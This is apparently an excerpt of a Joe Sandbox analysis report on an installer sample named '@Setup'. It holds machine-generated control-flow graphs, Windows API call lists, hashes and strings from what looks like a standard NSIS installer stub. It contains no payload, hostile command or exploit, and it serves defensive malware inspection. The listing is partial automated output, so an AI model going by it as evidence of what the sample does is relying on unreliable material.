                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                      • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,74DF23A0,00000000), ref: 00406902
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                    • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                    • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                    • String ID: New install of "%s" to "%s"${
                                                                                                                                                    • API String ID: 2110491804-1641061399
                                                                                                                                                    • Opcode ID: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                                                                                                                    • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                    • Opcode Fuzzy Hash: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                                                                                                                    • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                    APIs
                                                                                                                                                    • #17.COMCTL32 ref: 004038CE
                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                    • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                    • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                    • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                    • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                    • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                    • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                    • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                    • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                    • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                    • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                    • API String ID: 2435955865-3712954417
                                                                                                                                                    • Opcode ID: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                                                                                                                                    • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                    • Opcode Fuzzy Hash: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                                                                                                                                    • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 587 406831-40683c 588 40683e-40684d 587->588 589 40684f-406863 587->589 588->589 590 406865-406872 589->590 591 40687b-406881 589->591 590->591 592 406874-406877 590->592 593 406887-406888 591->593 594 406aad-406ab6 591->594 592->591 597 406889-406896 593->597 595 406ac1-406ac2 594->595 596 406ab8-406abc call 406035 594->596 596->595 599 406aab-406aac 597->599 600 40689c-4068ac 597->600 599->594 601 4068b2-4068b5 600->601 602 406a86 600->602 603 406a89 601->603 604 4068bb-4068f9 601->604 602->603 605 406a99-406a9c 603->605 606 406a8b-406a97 603->606 607 406a19-406a22 604->607 608 4068ff-40690a GetVersion 604->608 611 406a9f-406aa5 605->611 606->611 609 406a24-406a27 607->609 610 406a5b-406a64 607->610 612 406928 608->612 613 40690c-406914 608->613 617 406a37-406a46 call 406035 609->617 618 406a29-406a35 call 405f7d 609->618 615 406a72-406a84 lstrlenW 610->615 616 406a66-406a6d call 406831 610->616 611->597 611->599 614 40692f-406936 612->614 613->612 619 406916-40691a 613->619 621 406938-40693a 614->621 622 40693b-40693d 614->622 615->611 616->615 626 406a4b-406a51 617->626 618->626 619->612 625 40691c-406920 619->625 621->622 627 406979-40697c 622->627 628 40693f-406965 call 405eff 622->628 625->612 630 406922-406926 625->630 626->615 631 406a53-406a59 call 406064 626->631 633 40698c-40698f 627->633 634 40697e-40698a GetSystemDirectoryW 627->634 641 406a05-406a09 628->641 642 40696b-406974 call 406831 628->642 630->614 631->615 638 406991-40699f GetWindowsDirectoryW 633->638 639 4069fb-4069fd 633->639 637 4069ff-406a03 634->637 637->631 637->641 638->639 639->637 643 4069a1-4069ab 639->643 641->631 645 406a0b-406a17 lstrcatW 641->645 642->637 646 4069c5-4069db SHGetSpecialFolderLocation 643->646 647 4069ad-4069b0 643->647 645->631 649 4069f6-4069f8 646->649 650 4069dd-4069f4 SHGetPathFromIDListW CoTaskMemFree 646->650 647->646 648 4069b2-4069b9 647->648 652 4069c1-4069c3 648->652 649->639 650->637 650->649 652->637 652->646
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,74DF23A0,00000000), ref: 00406902
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                    • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,74DF23A0,00000000), ref: 00406A73
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                    • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                    • API String ID: 3581403547-1792361021
                                                                                                                                                    • Opcode ID: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                                                                                                                                    • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                    • Opcode Fuzzy Hash: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                                                                                                                                    • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 856 406301-406315 FindFirstFileW 857 406322 856->857 858 406317-406320 FindClose 856->858 859 406324-406325 857->859 858->859
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                    • String ID: jF
                                                                                                                                                    • API String ID: 2295610775-3349280890
                                                                                                                                                    • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                    • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                    • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                    • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 310444273-0
                                                                                                                                                    • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                    • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                    • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                    • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                    APIs
                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                    Strings
                                                                                                                                                    • Rename: %s, xrefs: 004018F8
                                                                                                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                    • detailprint: %s, xrefs: 00401679
                                                                                                                                                    • Jump: %d, xrefs: 00401602
                                                                                                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                    • Call: %d, xrefs: 0040165A
                                                                                                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                    • Sleep(%d), xrefs: 0040169D
                                                                                                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                    • BringToFront, xrefs: 004016BD
                                                                                                                                                    Memory Dump Source
